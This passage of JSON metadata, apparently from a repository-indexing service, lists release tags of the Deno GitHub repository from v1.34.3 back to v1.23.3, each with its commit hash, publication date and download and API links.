","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.g